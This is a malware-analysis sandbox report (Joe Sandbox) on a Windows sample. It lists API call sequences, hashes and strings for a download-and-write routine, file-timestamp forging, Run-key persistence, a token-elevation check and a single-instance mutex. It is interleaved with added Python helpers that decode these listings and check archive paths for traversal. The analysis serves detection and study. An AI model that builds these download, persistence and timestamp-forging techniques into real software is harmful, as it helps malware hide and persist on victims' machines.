                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.1370071949.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                                        • Associated: 00000003.00000002.1370030565.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000003.00000002.1370117097.0000000000C99000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000003.00000002.1370150527.0000000000CA2000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000003.00000002.1370211837.0000000000CA4000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_c80000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$CloseHandleInternet$AllocFileFreeOpen$CreatePathToken$AllocateAttributesCombineCurrentDirectoryEnvironmentExistsExpandInformationReadSleepStringslstrcat
                                                        • String ID: D$K$Software\Microsoft\Windows\CurrentVersion\Run$V$x
                                                        • API String ID: 4228357295-1478008780
                                                        • Opcode ID: 25c37558f4549876201c7b8a18bc3c11cdb4a5662bb15741e4b886d8806e5f47
                                                        • Instruction ID: 0bfb090e78a2ef204b3b4e747b277be24a5cf45f06dc57c5a6c82b6ba403d3c7
                                                        • Opcode Fuzzy Hash: 25c37558f4549876201c7b8a18bc3c11cdb4a5662bb15741e4b886d8806e5f47
                                                        • Instruction Fuzzy Hash: AFC19074900219ABCB20AFA5DC4CBAEB7F8FF1D708F14405AF959E7250EB749981CB19

                                                        Control-flow Graph

                                                        APIs
                                                        • lstrcmpA.KERNEL32(00000000,?), ref: 00C810A2
                                                        • GetProcessHeap.KERNEL32(00000008,?), ref: 00C810C7
                                                        • HeapAlloc.KERNEL32(00000000), ref: 00C810CE
                                                        • lstrlenA.KERNEL32(M1Zw0w66GQYFi), ref: 00C810EC
                                                        • GetProcessHeap.KERNEL32(00000008,?), ref: 00C8123C
                                                        • HeapAlloc.KERNEL32(00000000), ref: 00C81243
                                                        • GetProcessHeap.KERNEL32(00000008,00000002), ref: 00C81285
                                                        • HeapAlloc.KERNEL32(00000000), ref: 00C8128C
                                                        • GetProcessHeap.KERNEL32(00000008,00000047), ref: 00C812E7
                                                        • HeapAlloc.KERNEL32(00000000), ref: 00C812EE
                                                        • GetProcessHeap.KERNEL32(00000008,00000047), ref: 00C81333
                                                        • HeapAlloc.KERNEL32(00000000), ref: 00C8133A
                                                        • GetProcessHeap.KERNEL32(00000008,00000047), ref: 00C8137F
                                                        • HeapAlloc.KERNEL32(00000000), ref: 00C81386
                                                        • GetProcessHeap.KERNEL32(00000008,00000049), ref: 00C813E5
                                                        • HeapAlloc.KERNEL32(00000000), ref: 00C813EC
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.1370071949.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                                        • Associated: 00000003.00000002.1370030565.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000003.00000002.1370117097.0000000000C99000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000003.00000002.1370150527.0000000000CA2000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000003.00000002.1370211837.0000000000CA4000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_c80000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID: Heap$AllocProcess$lstrcmplstrlen
                                                        • String ID: M1Zw0w66GQYFi
                                                        • API String ID: 522894340-229323296
                                                        • Opcode ID: a4ff0d740bf2434099dd6e43dc6e8ee8c23c0149558b3616bf98b1b30a6a721d
                                                        • Instruction ID: b81846291d439628f183adb725027f56a3eb256efaf86af5999c7396d18d4801
                                                        • Opcode Fuzzy Hash: a4ff0d740bf2434099dd6e43dc6e8ee8c23c0149558b3616bf98b1b30a6a721d
                                                        • Instruction Fuzzy Hash: 23D10571C041659FDB10DFA8C8986FEBBF8FF19314F1841AAE895D7342D6399A05CBA0

                                                        Control-flow Graph

                                                        APIs
                                                        • InternetOpenW.WININET(00000000,00000000,00000000,00000000,04000000), ref: 00C825E1
                                                        • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 00C825FB
                                                        • InternetReadFile.WININET(00000000,?,00000800,FFFFFFFF), ref: 00C82644
                                                        • GetProcessHeap.KERNEL32(00000008,0000000100000000), ref: 00C8265A
                                                        • HeapAlloc.KERNEL32(00000000), ref: 00C8265D
                                                        • GetProcessHeap.KERNEL32(00000000,00000000,0000000100000000), ref: 00C82668
                                                        • RtlReAllocateHeap.NTDLL(00000000), ref: 00C8266B
                                                        • GetProcessHeap.KERNEL32(00000008,FFFFFFFF), ref: 00C826AA
                                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00C826AD
                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00C826D7
                                                        • RtlFreeHeap.NTDLL(00000000), ref: 00C826DA
                                                        • InternetCloseHandle.WININET(?), ref: 00C826E6
                                                        • InternetCloseHandle.WININET(?), ref: 00C826F3
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.1370071949.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                                         • Associated: 00000003.00000002.1370030565.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000003.00000002.1370117097.0000000000C99000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000003.00000002.1370150527.0000000000CA2000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000003.00000002.1370211837.0000000000CA4000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_c80000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID: Heap$Internet$Process$AllocateCloseHandleOpen$AllocFileFreeRead
                                                        • String ID:
                                                        • API String ID: 1681177425-0
                                                        • Opcode ID: 042ac669ed9106e2b2b20f6d2ed08ccf12251e5c64973e35544f4882bba4f7b0
                                                        • Instruction ID: d62234dd90cc3c7df30153a5f630705ff6ea4d312b5a765bf9dcc539f1906e17
                                                        • Opcode Fuzzy Hash: 042ac669ed9106e2b2b20f6d2ed08ccf12251e5c64973e35544f4882bba4f7b0
                                                        • Instruction Fuzzy Hash: D5313E71900229ABDB609B69DC4DF9EBBFCFF89714F0081A9B55993250DE309E44CFA4

                                                         Control-flow Graph: rendered graph omitted. Basic blocks 00C869E0-00C86DC9; Win32 calls inside the graph: CreateFileW, WriteFile, SetFileTime, CloseHandle; internal calls: 00C86830, 00C86F60, 00C86120, 00C85540, 00C8C52B, 00C847E0, 00C8A23B, 00C827B0, 00C85B70, 00C871B0, 00C85D40, 00C87097.
                                                        APIs
                                                        • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,?,00000000,?,?,?,?,00000000,00000000,00000000), ref: 00C86C6A
                                                        • WriteFile.KERNEL32(?,00000000,00000000,?,00000000,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00C86CFF
                                                        • SetFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00C86D8F
                                                        • CloseHandle.KERNEL32(?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00C86D96
                                                        • CloseHandle.KERNEL32(?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00C86DA7
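The two API listings above (the WinINet download loop at 00C825E1-00C826F3 and the file writer at 00C86C6A-00C86DA7) are easier to reason about once the argument columns are decoded: the third argument of InternetReadFile is the read chunk size, and the second and fifth arguments of CreateFileW are the access mask and creation disposition. The following parser is an added example written for this page, not code from the sandbox or from the sample. Its input is an abridged copy of the report lines above, constructed inline; the constant tables are standard Win32 values, and the `summarize` heuristics are the editor's, not the report's signatures.

```python
import re
from dataclasses import dataclass

# Constructed input: abridged copies of the "APIs" lines from the WinINet downloader
# (refs 00C825E1..00C826F3) and the file writer (refs 00C86C6A..00C86DA7) in this
# report section. Trailing stack values are cut; "?" marks an unresolved value.
SAMPLE_API_LINES = """\
• InternetOpenW.WININET(00000000,00000000,00000000,00000000,04000000), ref: 00C825E1
• InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 00C825FB
• InternetReadFile.WININET(00000000,?,00000800,FFFFFFFF), ref: 00C82644
• GetProcessHeap.KERNEL32(00000008,0000000100000000), ref: 00C8265A
• HeapAlloc.KERNEL32(00000000), ref: 00C8265D
• RtlReAllocateHeap.NTDLL(00000000), ref: 00C8266B
• InternetCloseHandle.WININET(?), ref: 00C826E6
• CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,?,00000000), ref: 00C86C6A
• WriteFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00C86CFF
• SetFileTime.KERNEL32(?,?,?,?), ref: 00C86D8F
• CloseHandle.KERNEL32(?), ref: 00C86D96
• GetLastError.KERNEL32 ref: 00C82737
"""

# One report line: optional "Part of subcall function XXXX:" prefix, Name.MODULE,
# an optional "(args)" group (greedy, so "00000014(TokenElevation)" stays intact),
# then ", ref: ADDR". GetLastError-style lines carry no parentheses at all.
LINE_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(?P<name>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)


@dataclass
class ApiCall:
    name: str
    module: str
    args: list   # raw hex strings as printed, or "?" when the sandbox could not resolve them
    ref: int     # address of the call site

    def arg_int(self, index):
        """Argument `index` as an int, or None if it is missing or unresolved."""
        if index >= len(self.args) or self.args[index] == "?":
            return None
        return int(self.args[index].split("(")[0], 16)   # drop an enum annotation if present


def parse_api_lines(text):
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        raw = m.group("args")
        args = [a.strip() for a in raw.split(",")] if raw else []
        calls.append(ApiCall(m.group("name"), m.group("module"), args, int(m.group("ref"), 16)))
    return calls


# CreateFileW(lpFileName, dwDesiredAccess, dwShareMode, lpSecurityAttributes,
#             dwCreationDisposition, dwFlagsAndAttributes, hTemplateFile)
GENERIC_ACCESS = {0x80000000: "GENERIC_READ", 0x40000000: "GENERIC_WRITE",
                  0x20000000: "GENERIC_EXECUTE", 0x10000000: "GENERIC_ALL"}
DISPOSITION = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING",
               4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}


def decode_create_file(call):
    """Decode the access mask (arg 1) and creation disposition (arg 4) of a CreateFileW call."""
    access = call.arg_int(1) or 0
    names = [n for bit, n in GENERIC_ACCESS.items() if access & bit]
    return {"access": names, "disposition": DISPOSITION.get(call.arg_int(4), "unknown")}


def summarize(calls):
    """Reduce the call list to the behaviours an analyst wants to confirm (editor's heuristics)."""
    names = {c.name for c in calls}
    summary = {
        "downloads_to_memory": ({"InternetOpenUrlW", "InternetReadFile"} <= names
                                and bool({"HeapAlloc", "RtlReAllocateHeap"} & names)),
        "read_chunk_size": None,
        "writes_new_file": False,
        "sets_file_time": "SetFileTime" in names,
    }
    for c in calls:
        if c.name == "InternetReadFile":
            summary["read_chunk_size"] = c.arg_int(2)   # dwNumberOfBytesToRead
        if c.name == "CreateFileW":
            d = decode_create_file(c)
            summary["writes_new_file"] = ("GENERIC_WRITE" in d["access"]
                                          and d["disposition"] == "CREATE_ALWAYS"
                                          and "WriteFile" in names)
    return summary


if __name__ == "__main__":
    for key, value in summarize(parse_api_lines(SAMPLE_API_LINES)).items():
        print("%s: %s" % (key, value))
```

On the lines above this yields a 0x800-byte read loop that grows a heap buffer with RtlReAllocateHeap, followed by CreateFileW(GENERIC_WRITE, CREATE_ALWAYS) and WriteFile, then SetFileTime before the handle is closed; the timestamp call is the detail worth carrying into a timeline, since the dropped file's mtime will not reflect when it was written.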
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.1370071949.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                                         • Associated: 00000003.00000002.1370030565.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000003.00000002.1370117097.0000000000C99000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000003.00000002.1370150527.0000000000CA2000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000003.00000002.1370211837.0000000000CA4000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_c80000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID: File$CloseHandle$CreateTimeWrite
                                                        • String ID: %s%s$%s%s%s$:
                                                        • API String ID: 3400595745-3034790606
                                                        • Opcode ID: ef23ef95af1e0f2e443e92f8250e99d50b1d26a1ad64e1425c8d87c097d4c4df
                                                        • Instruction ID: aedb140a2ed7a29af89b41f7f11a3188789aa088325753665a9d1c0d22d3d352
                                                        • Opcode Fuzzy Hash: ef23ef95af1e0f2e443e92f8250e99d50b1d26a1ad64e1425c8d87c097d4c4df
                                                        • Instruction Fuzzy Hash: 2BB1E7716006149BDB34FF64DC85BEAB3B4FF04318F10056EE96A97281E770AE94DB98

                                                         Control-flow Graph: rendered graph omitted. Basic blocks 00C86830-00C86DC9 (the graph runs on into the 00C869E0 routine listed above); Win32 calls inside the graph: GetFileAttributesW, CreateDirectoryW, CreateFileW, WriteFile, SetFileTime, CloseHandle; internal calls include 00C8A23B, 00C89C70, 00C86830 (the routine calls itself), 00C86F60 and 00C87097.
                                                        APIs
                                                        • GetFileAttributesW.KERNEL32(?,?,?,00000000), ref: 00C868B7
                                                        • CreateDirectoryW.KERNEL32(?,00000000,?,?,00000000), ref: 00C868CB
                                                        • GetFileAttributesW.KERNEL32(?,?,?,00000000), ref: 00C869A7
                                                        • CreateDirectoryW.KERNEL32(?,00000000,?,?,00000000), ref: 00C869BB
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.1370071949.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                                         • Associated: 00000003.00000002.1370030565.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000003.00000002.1370117097.0000000000C99000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000003.00000002.1370150527.0000000000CA2000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000003.00000002.1370211837.0000000000CA4000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_c80000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID: AttributesCreateDirectoryFile
                                                        • String ID:
                                                        • API String ID: 3401506121-0
                                                        • Opcode ID: 24cac2fe1843fcc1d59e70014a3f6dac8bead21dfb5a378f92c56ac8a5249e52
                                                        • Instruction ID: b91a41e23a9c9544103707d87c638511370ce6b94fe4c5d8e91b92104e3f8d66
                                                        • Opcode Fuzzy Hash: 24cac2fe1843fcc1d59e70014a3f6dac8bead21dfb5a378f92c56ac8a5249e52
                                                        • Instruction Fuzzy Hash: 1E5107719002189BCB24FF78D885BEAB3B8EF44318F14466AE929D71C1EB319E55CB58

                                                         Control-flow Graph: rendered graph omitted. Basic blocks 00C82710-00C82790; Win32 calls inside the graph: CreateMutexW, GetLastError, ExitProcess; internal calls: 00C81000, 00C824B0, 00C81420, 00C81860, 00C82520. The GetLastError result after CreateMutexW selects either the ExitProcess block at 00C8277D or the rest of the routine.
                                                        APIs
                                                          • Part of subcall function 00C81000: lstrcmpA.KERNEL32(00000000,?), ref: 00C810A2
                                                          • Part of subcall function 00C81000: GetProcessHeap.KERNEL32(00000008,?), ref: 00C810C7
                                                          • Part of subcall function 00C81000: HeapAlloc.KERNEL32(00000000), ref: 00C810CE
                                                          • Part of subcall function 00C81000: lstrlenA.KERNEL32(M1Zw0w66GQYFi), ref: 00C810EC
                                                        • CreateMutexW.KERNEL32(00000000,00000000,?), ref: 00C82731
                                                        • GetLastError.KERNEL32 ref: 00C82737
                                                        • ExitProcess.KERNEL32 ref: 00C8277F
                                                          • Part of subcall function 00C824B0: GetCurrentProcess.KERNEL32(00000008,?), ref: 00C824CC
                                                          • Part of subcall function 00C824B0: OpenProcessToken.ADVAPI32(00000000), ref: 00C824D3
                                                           • Part of subcall function 00C824B0: GetTokenInformation.ADVAPI32(?,00000014(TokenElevation),?,00000004,?), ref: 00C824F3 (the export labels class 0x14 as TokenIntegrityLevel; in TOKEN_INFORMATION_CLASS 0x14 = 20 is TokenElevation and TokenIntegrityLevel is 25 = 0x19, and the 4-byte output length matches TOKEN_ELEVATION, so this is an "is my token elevated" check)
                                                          • Part of subcall function 00C824B0: CloseHandle.KERNEL32(?), ref: 00C82502
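The subcall at 00C824B0 asks for token information class 0x14 into a 4-byte buffer, and the routine at 00C82731 creates a named mutex and then reads GetLastError before deciding whether to ExitProcess. The block below is an added example written for this page, not code from the sample, showing how those two outputs are interpreted: a 4-byte TOKEN_ELEVATION versus the SID-carrying TOKEN_MANDATORY_LABEL that the export's label would imply, and the ERROR_ALREADY_EXISTS gate behind the mutex check. The buffers are constructed; the class numbers, error code and integrity RIDs are standard Windows constants; and the TokenIntegrityLevel branch assumes it is handed only the SID bytes, not the pointer-carrying structure that precedes them in memory.

```python
import struct

# TOKEN_INFORMATION_CLASS values from winnt.h (standard values; the report only shows 0x14).
TOKEN_ELEVATION = 20         # 0x14, the class passed at 00C824F3
TOKEN_INTEGRITY_LEVEL = 25   # 0x19, the class the export's label names
ERROR_ALREADY_EXISTS = 183   # GetLastError after CreateMutexW opened an existing name

# Integrity RIDs of the S-1-16-<rid> mandatory-label SID (coarse: 0x2100 "Medium Plus" maps to Medium).
INTEGRITY_RIDS = {0x0000: "Untrusted", 0x1000: "Low", 0x2000: "Medium",
                  0x3000: "High", 0x4000: "System"}


def parse_sid(blob):
    """Parse a binary SID: revision, sub-authority count, 48-bit big-endian identifier
    authority, then little-endian 32-bit sub-authorities."""
    if len(blob) < 8:
        raise ValueError("SID header needs 8 bytes")
    revision, count = blob[0], blob[1]
    if count == 0 or len(blob) < 8 + 4 * count:
        raise ValueError("SID truncated or empty")
    authority = int.from_bytes(blob[2:8], "big")
    subs = list(struct.unpack_from("<%dI" % count, blob, 8))
    return revision, authority, subs


def sid_to_string(blob):
    revision, authority, subs = parse_sid(blob)
    return "S-%d-%d" % (revision, authority) + "".join("-%d" % s for s in subs)


def decode_token_info(info_class, buf):
    """Interpret a GetTokenInformation output buffer for the two classes in question.

    TokenElevation fills a 4-byte TOKEN_ELEVATION whose DWORD is non-zero when the token
    is elevated. TokenIntegrityLevel fills a TOKEN_MANDATORY_LABEL (SID pointer plus
    attributes) followed by the SID itself, which never fits in 4 bytes; that is why the
    00000004 length in the report pins the call at 00C824F3 to TokenElevation.
    Assumption for this offline example: for TokenIntegrityLevel, `buf` holds just the
    SID bytes, not the pointer-carrying structure that precedes them in process memory.
    """
    if info_class == TOKEN_ELEVATION:
        if len(buf) < 4:
            raise ValueError("TOKEN_ELEVATION needs 4 bytes")
        return {"class": "TokenElevation",
                "elevated": struct.unpack_from("<I", buf)[0] != 0}
    if info_class == TOKEN_INTEGRITY_LEVEL:
        if len(buf) < 12:
            raise ValueError("a mandatory-label SID cannot fit in %d bytes" % len(buf))
        _, _, subs = parse_sid(buf)
        return {"class": "TokenIntegrityLevel", "sid": sid_to_string(buf),
                "level": INTEGRITY_RIDS.get(subs[-1] & 0xF000, "Unknown")}
    raise ValueError("unsupported TOKEN_INFORMATION_CLASS %d" % info_class)


def single_instance_decision(last_error):
    """The chain at 00C82731-00C8277F: CreateMutexW, GetLastError, then ExitProcess when
    the name already existed (a second copy is running, or an analyst pre-created it)."""
    return "exit" if last_error == ERROR_ALREADY_EXISTS else "continue"


# Constructed buffers (not captured from the sample): an elevated TOKEN_ELEVATION and the
# S-1-16-8192 (Medium) mandatory-label SID.
ELEVATED_BUF = b"\x01\x00\x00\x00"
MEDIUM_IL_SID = bytes([1, 1]) + (16).to_bytes(6, "big") + struct.pack("<I", 0x2000)

if __name__ == "__main__":
    print(decode_token_info(TOKEN_ELEVATION, ELEVATED_BUF))
    print(decode_token_info(TOKEN_INTEGRITY_LEVEL, MEDIUM_IL_SID))
    print(single_instance_decision(ERROR_ALREADY_EXISTS))
```

When reproducing the sample's behaviour in a lab, pre-creating the mutex name it expects (the name is an unresolved "?" argument in the listing above and has to be recovered from the dump) is the quickest way to confirm that the ExitProcess branch is the "already running" exit rather than an unrelated error path.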
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.1370071949.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                                         • Associated: 00000003.00000002.1370030565.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000003.00000002.1370117097.0000000000C99000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000003.00000002.1370150527.0000000000CA2000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000003.00000002.1370211837.0000000000CA4000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_c80000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID: Process$HeapToken$AllocCloseCreateCurrentErrorExitHandleInformationLastMutexOpenlstrcmplstrlen
                                                        • String ID:
                                                        • API String ID: 2480484397-0
                                                        • Opcode ID: 95a2a41cb1062874d5cd3478c4397b61a0fb01b0396995c6c4d1f0a67054e12b
                                                        • Instruction ID: e338a9f2ea0afe861962d36ded53f1eb462d492591d0ff06ea77cc498f862623
                                                        • Opcode Fuzzy Hash: 95a2a41cb1062874d5cd3478c4397b61a0fb01b0396995c6c4d1f0a67054e12b
                                                        • Instruction Fuzzy Hash: 9101AD301083059FDB14BB55DC0EB2DB7E5EB84349F148A2DF9B4410E1EB308954EBAB

                                                         Control-flow Graph: rendered graph omitted. Basic blocks 00C8DC45-00C8DC7E; Win32 calls inside the graph: RtlFreeHeap, GetLastError; internal calls: 00C8DBB8, 00C8DC32.
                                                        APIs
                                                        • RtlFreeHeap.NTDLL(00000000,00000000,?,00C90BB6,?,00000000,?,?,00C90BDB,?,00000007,?,?,00C91029,?,?), ref: 00C8DC5B
                                                        • GetLastError.KERNEL32(?,?,00C90BB6,?,00000000,?,?,00C90BDB,?,00000007,?,?,00C91029,?,?), ref: 00C8DC66
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.1370071949.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                                         • Associated: 00000003.00000002.1370030565.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000003.00000002.1370117097.0000000000C99000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000003.00000002.1370150527.0000000000CA2000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000003.00000002.1370211837.0000000000CA4000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_c80000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID: ErrorFreeHeapLast
                                                        • String ID:
                                                        • API String ID: 485612231-0
                                                        • Opcode ID: 53212b4edc6f0539c86119ef9353bbe09c03901274be05792078adf28cf7e38c
                                                        • Instruction ID: 6ecd1fa4c4addb958113c20cfaa1ea20ae5c3453336def2d16df2a2458cb4684
                                                        • Opcode Fuzzy Hash: 53212b4edc6f0539c86119ef9353bbe09c03901274be05792078adf28cf7e38c
                                                        • Instruction Fuzzy Hash: 7DE08C32140218ABCF113BA8AD0DF993BA8EB09399F504025F6198A0A0CB70C940CB98

                                                         Control-flow Graph: rendered graph omitted. Basic blocks 00C8DC7F-00C8DCCC; Win32 calls inside the graph: RtlAllocateHeap; internal calls: 00C8DC32, 00C8D247, 00C8C57B.
                                                        APIs
                                                        • RtlAllocateHeap.NTDLL(00000000,00000000,00000000,?,00C8718C,00000000,?,00C86E07,0000044C,CA1DECC3,771AF380,00000000,00000000,000000FF,?,00C814D5), ref: 00C8DCB1
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.1370071949.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                                         • Associated: 00000003.00000002.1370030565.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000003.00000002.1370117097.0000000000C99000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000003.00000002.1370150527.0000000000CA2000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000003.00000002.1370211837.0000000000CA4000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_c80000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID: AllocateHeap
                                                        • String ID:
                                                        • API String ID: 1279760036-0
                                                        • Opcode ID: 5371f2af1d0d50e689f5e6eb44a3602c0fb72e3549a6e38a543c244be8908e00
                                                        • Instruction ID: 9adfbbcae7f68fe92ced24c0d21d43b0dbfc06d02ca15d77f82c77ac5c459b7c
                                                        • Opcode Fuzzy Hash: 5371f2af1d0d50e689f5e6eb44a3602c0fb72e3549a6e38a543c244be8908e00
                                                        • Instruction Fuzzy Hash: 46E06D3164422067DB21376AAC04B5A7B48AF427B8F150161EC27961D0CBA0DE01D3AD
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.1370071949.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                                         • Associated: 00000003.00000002.1370030565.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000003.00000002.1370117097.0000000000C99000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000003.00000002.1370150527.0000000000CA2000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000003.00000002.1370211837.0000000000CA4000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_c80000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: /../$/..\$\../$\..\
                                                        • API String ID: 0-3885502717
                                                        • Opcode ID: 5080549309a826ca9b32cdc4d2358fb441fa955f9b99f6da77138be75d9720cf
                                                        • Instruction ID: cd427be990fb9f2ddf34e7a5dae3a839f2a7ee4b9b9daebba8eb3e0d3895db52
                                                        • Opcode Fuzzy Hash: 5080549309a826ca9b32cdc4d2358fb441fa955f9b99f6da77138be75d9720cf
                                                        • Instruction Fuzzy Hash: 9312E371A006148BCB25DF24C8857AABBF5EF44318F1842EDE85D9B392D731AB45CF94
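The function above makes no API calls and carries exactly four strings: `/../`, `/..\`, `\../` and `\..\`. That is the classic substring test an archive extractor runs over entry names before it creates directories and files, which fits the GetFileAttributesW/CreateDirectoryW and CreateFileW/WriteFile/SetFileTime routines listed earlier in this section; whether this sample's check does more than match those four substrings is not visible in the report, so treat that pairing as an inference. The block below is an added example for this page, not code from the sample, and it deliberately goes beyond the four substrings: it also rejects a leading `..`, absolute paths and drive-qualified names, all of which a substring-only test lets through. The entry names are constructed.

```python
import posixpath

# The four substrings embedded in the function above (copied from its String ID line).
TRAVERSAL_MARKERS = ("/../", "/..\\", "\\../", "\\..\\")


def has_traversal_marker(name):
    """What the four embedded strings can detect on their own: a ".." segment that has a
    separator on both sides. A name that *starts* with ".." is not matched."""
    return any(marker in name for marker in TRAVERSAL_MARKERS)


def safe_entry_path(dest_root, name):
    """Return the path an extractor may write archive entry `name` to under `dest_root`,
    or None when the entry must be rejected.

    Separators are unified first because Win32 treats "\\" and "/" alike, so an entry
    written with either one reaches the same directory. Beyond the substring test this
    also rejects a leading "..", absolute and drive-qualified names, and NUL bytes."""
    if not name or "\x00" in name:
        return None
    unified = name.replace("\\", "/")
    if unified.startswith("/") or (len(unified) > 1 and unified[1] == ":"):
        return None                                   # absolute path or drive letter
    parts = [p for p in posixpath.normpath(unified).split("/") if p not in ("", ".")]
    if not parts or ".." in parts:
        return None                                   # would escape dest_root after normalisation
    return posixpath.join(dest_root, *parts)


def triage_entries(dest_root, names):
    """Classify entry names: {name: (substring_test_hit, safe_path_or_None)}."""
    return {n: (has_traversal_marker(n), safe_entry_path(dest_root, n)) for n in names}


# Constructed entry names, not taken from any archive the sample handles.
SAMPLE_ENTRIES = ["client/run.exe", "client/../../outside.txt", "..\\evil.dll",
                  "/Windows/System32/y.dll", "C:\\Temp\\z.bin", "sub/./f.txt"]

if __name__ == "__main__":
    for name, (hit, path) in triage_entries("C:/extract", SAMPLE_ENTRIES).items():
        print("%-28s substring=%-5s -> %s" % (name, hit, path or "REJECT"))
```

The `..\evil.dll` row is the one to note: the substring test reports no hit, yet the entry lands one level above the extraction root, so an analyst checking where a dropper unpacks to should look at the parent directory as well.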
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.1370071949.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                                         • Associated: 00000003.00000002.1370030565.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000003.00000002.1370117097.0000000000C99000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000003.00000002.1370150527.0000000000CA2000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000003.00000002.1370211837.0000000000CA4000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
